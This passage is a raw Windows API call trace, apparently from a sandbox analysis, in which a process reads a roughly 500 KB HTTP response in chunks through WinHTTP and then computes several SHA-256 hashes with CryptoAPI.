lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.831] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.833] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x31f00) returned 0x32ac5770 [0181.833] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32af566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.833] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.834] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x33f00) returned 0x32ac5770 [0181.834] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32af766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.834] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.834] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x35f00) returned 0x32ac5770 [0181.834] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32af966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.834] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.834] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x37f00) returned 0x32ac5770 [0181.835] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32afb66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32afb66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.835] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.144] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x39f00) returned 0x32ac5770 [0182.144] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32afd66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32afd66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.144] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.145] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3bf00) returned 0x32ac5770 [0182.145] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32aff66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aff66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.145] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.145] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3df00) returned 0x32ac5770 [0182.145] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.145] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.145] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3ff00) returned 0x32ac5770 [0182.145] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.146] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.146] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x41f00) returned 0x32ac5770 [0182.146] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.146] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.146] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x43f00) returned 0x32ac5770 [0182.146] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.146] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.147] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x45f00) returned 0x32ac5770 [0182.147] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.147] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.147] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x47f00) returned 0x32ac5770 [0182.147] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.147] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.147] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x49f00) returned 0x32ac5770 [0182.147] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.148] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.148] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4bf00) returned 0x32ac5770 [0182.148] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b0f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.148] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.513] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4df00) returned 0x32ac5770 [0182.514] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.514] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.514] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4ff00) returned 0x32ac5770 [0182.514] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.514] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.515] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x51f00) returned 0x32ac5770 [0182.515] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.515] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.515] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x53f00) returned 0x32ac5770 [0182.515] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.515] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.516] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x55f00) returned 0x32ac5770 [0182.516] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.516] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.516] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x57f00) returned 0x32ac5770 [0182.516] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.517] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.517] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x59f00) returned 0x32ac5770 [0182.517] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.517] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.517] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5bf00) returned 0x32ac5770 [0182.518] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b1f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.518] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.518] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5df00) returned 0x32ac5770 [0182.518] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.518] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.518] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5ff00) returned 0x32ac5770 [0182.518] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.518] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.917] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x61f00) returned 0x32ac5770 [0182.917] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.918] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.918] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x63f00) returned 0x32ac5770 [0182.918] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.918] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.918] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x65f00) returned 0x32ac5770 [0182.918] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.918] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.919] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x67f00) returned 0x32ac5770 [0182.919] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.919] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.919] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x69f00) returned 0x32ac5770 [0182.919] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.919] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.920] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6bf00) returned 0x32ac5770 [0182.920] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b2f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.920] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.920] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6df00) returned 0x32ac5770 [0182.920] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.920] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.920] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6ff00) returned 0x32ac5770 [0182.920] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.920] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.921] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x71f00) returned 0x32ac5770 [0182.921] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.921] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0182.922] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x73f00) returned 0x32ac5770 [0182.922] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0182.922] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0183.419] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x75f00) returned 0x32ac5770 [0183.419] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0183.419] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0183.420] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x77f00) returned 0x32ac5770 [0183.421] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0183.421] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0183.421] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x79f00) returned 0x32ac5770 [0183.421] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0183.421] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0183.421] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7bf00) returned 0x32ac5770 [0183.421] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b3f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0183.422] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x1672) returned 1 [0183.422] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7d570) returned 0x32ac5770 [0183.422] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32b4166e, dwNumberOfBytesToRead=0x1672, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b4166e*, lpdwNumberOfBytesRead=0xcd714*=0x1672) returned 1 [0183.422] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x0) returned 1 [0183.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32a441c0 [0183.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e786e0 [0183.423] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0183.423] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.423] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x20, dwFlags=0x0) returned 1 [0183.423] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.423] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0183.423] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e6fcf0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6fcf0, pdwDataLen=0xcdfdc) returned 1 [0183.423] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.423] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0183.423] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.424] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.424] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0x40, dwFlags=0x0) returned 1 [0183.424] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff00 [0183.424] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e6ff00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ff00, pdwDataLen=0xcdfdc) returned 1 [0183.424] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.424] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.424] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.425] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.425] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x60, dwFlags=0x0) returned 1 [0183.425] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.425] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f8d0 [0183.425] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e6f8d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6f8d0, pdwDataLen=0xcdfdc) returned 1 [0183.425] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.425] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.425] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338226d0) returned 1 [0183.425] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.426] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x80, dwFlags=0x0) returned 1 [0183.426] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0183.426] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e6fa20, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6fa20, pdwDataLen=0xcdfdc) returned 1 [0183.426] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.426] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0183.426] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.426] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.426] CryptHashData (hHash=0x3396f6d0, pbData=0x32e786e0, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0183.426] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f780 [0183.426] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e6f780, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6f780, pdwDataLen=0xcdfdc) returned 1 [0183.426] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0183.426] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.426] CryptAcquireContextW (in: 